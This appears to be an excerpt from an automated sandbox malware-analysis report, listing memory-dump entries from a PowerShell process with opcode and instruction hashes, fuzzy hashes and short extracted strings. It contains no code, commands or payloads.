• Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be1dce9fb885aa2bc2550a0a8660c2c4e5eeb4c606f525cc14c3e8b93ffbc2c5
• Instruction ID: 566ad85b49fa03e324f6c56c9323c00807f3f9181d9f2da1b9dbd3615bf78f49
• Opcode Fuzzy Hash: be1dce9fb885aa2bc2550a0a8660c2c4e5eeb4c606f525cc14c3e8b93ffbc2c5
• Instruction Fuzzy Hash: E8511422D0DBCA0FE796A72C4854B7A7FE1EF46660F1911EFC08EC71A3D614AC158362
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
Similarity
• API ID:
• String ID: 6<$(UE$(UE$(UE$(UE$(UE$(UE$r6<$r6<
• API String ID: 0-1347658969
• Opcode ID: fe6ccea66a3997334ff4a5a31e8d8a3fbfc37e035eadb11ce04b6d416e3917d4
• Instruction ID: 945f3290f490aa602630aaf9a8b539be6a9045d3eef8eab9261c0b9774479760
• Opcode Fuzzy Hash: fe6ccea66a3997334ff4a5a31e8d8a3fbfc37e035eadb11ce04b6d416e3917d4
• Instruction Fuzzy Hash: DDB21520A0DBC94FE75AA73C58242B97FE1EF47264F1901EBD08EC75A3D518AC56C361
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.392287856.000007FE895F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE895F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7fe895f0000_powershell.jbxd
Similarity
• API ID:
• String ID: |$*$[Y$[Y
• API String ID: 0-1633788789
• Opcode ID: 21e6fcf3e49059e5ab974d230c143f061f970c3a3b14f4371a7c07def178f81b
• Instruction ID: 3096f5c36e99487b050e8edb0f12f3e910b5a2d19dcd61c561f6fef6f34f2ff6
• Opcode Fuzzy Hash: 21e6fcf3e49059e5ab974d230c143f061f970c3a3b14f4371a7c07def178f81b
• Instruction Fuzzy Hash: 4472D020A0EBC94FE74BA73C68646B57FE1EF57254B1900EBD08EC71A3D9189C56C361
Uniqueness

Uniqueness Score: -1.00%